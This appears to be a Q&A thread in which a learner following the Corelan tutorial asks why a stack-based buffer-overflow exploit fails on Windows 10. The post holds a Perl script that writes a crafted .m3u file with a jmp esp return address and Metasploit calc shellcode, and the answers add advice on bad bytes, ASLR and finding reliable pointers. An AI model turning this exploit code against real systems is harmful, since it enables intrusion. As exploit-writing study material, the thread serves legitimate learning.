aheh

Reputation: 13

Exploit Development - Shellcode Doesn't Work?

I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit.

Firstly, I found that the position of EIP was after 26089 As (at 0016F454), and that ESP was 4 characters after EIP (at 0016F45C), according to the following code:

my $file = "eipcrash.m3u";
my $junk = "A" x 26089;           # filler up to the saved return address
my $eip  = pack('V', 0x444444);   # little-endian marker value that lands in EIP
my $shellcode = "\x90" x 4;       # padding at the spot ESP points to

open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);                   # raw bytes, no newline translation on Windows
print $FILE $junk . $eip . $shellcode;
close($FILE);

Results: https://i.sstatic.net/LmPG8.png

I find the pointer to a jmp esp instruction with !mona find -type instr -s "jmp esp" -x X. I use the 0x7457AC5B one.

Results: https://i.sstatic.net/iUoVY.png

I carefully checked that everything looked like it was working. Finalized code:

use strict;
use warnings;

my $file = "eipcrash.m3u";
my $junk = "A" x 26089;               # filler up to the saved return address
my $eip  = pack('V', 0x7457AC5B);     # jmp esp candidates: 0x6F90E8EC 0x1001B058 0x7457AC5B

my $shellcode = "\x90" x 4;           # NOP sled at the spot ESP points to

# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";

open(my $FILE, '>', $file) or die "cannot open $file: $!";
binmode($FILE);                       # raw bytes, no newline translation on Windows
print $FILE $junk . $eip . $shellcode;
close($FILE);
print "m3u file created successfully\n";

Final results: https://i.sstatic.net/JSwKt.png

It just doesn't work! I believe that my EIP and the position of the shellcode are correct, so the problem might be the effectiveness of the shellcode. I tried calc.exe-launching shellcodes from different websites, but none worked.

Why isn't it working? I'm using Windows 10 x64. Please guide me since I've been stuck on this for weeks, and I have scrutinized similar problems' articles on the web. I've really got no idea.

Thanks in advance.

Upvotes: 1

Views: 2298

Answers (2)

wireghoul

Reputation: 121

Did you check for bad bytes? Quite often certain bytes are used by file parsers as magic markers and can cause your shellcode to not be copied in full, or to be translated into corrupt shellcode. You can use the bytearray feature of mona to assist you with identifying bad bytes (https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/).

Upvotes: 0

Seb B.

Reputation: 697

  • Target OS:
    Watch out! ==> ASLR!!!
    In the tutorial, the target seems to be "Windows XP SP3 (En)", and he tested on "Windows XP [Version 5.1.2600]".
    In the comments, there's positive feedback that the procedure works on "Win7 Prof Ver 6.1.7600 English" with ASLR, even after a reboot. And you are testing on Windows 10, obviously with ASLR.
  • Reliability across Windows platforms:
    I confirm! You do indeed have control over EIP at 0016F454 (we see "DDDD"), and ESP points at 0016F45C (the shellcode).
    Did you try different instructions? (jmp, call, or push-ret)
    You used 0x7457AC5B ==> "jmp esp" in cfgmgr32.dll.
    Did you try 0x035bf23a ==> "jmp esp" in MSRMCcodec02.dll?
  • Try to find reliable pointers:
    pvefindaddr j -r esp -n -o (Immunity Debugger or anything). And it's always better to avoid "SafeSEH" and "ASLR".

Upvotes: 1
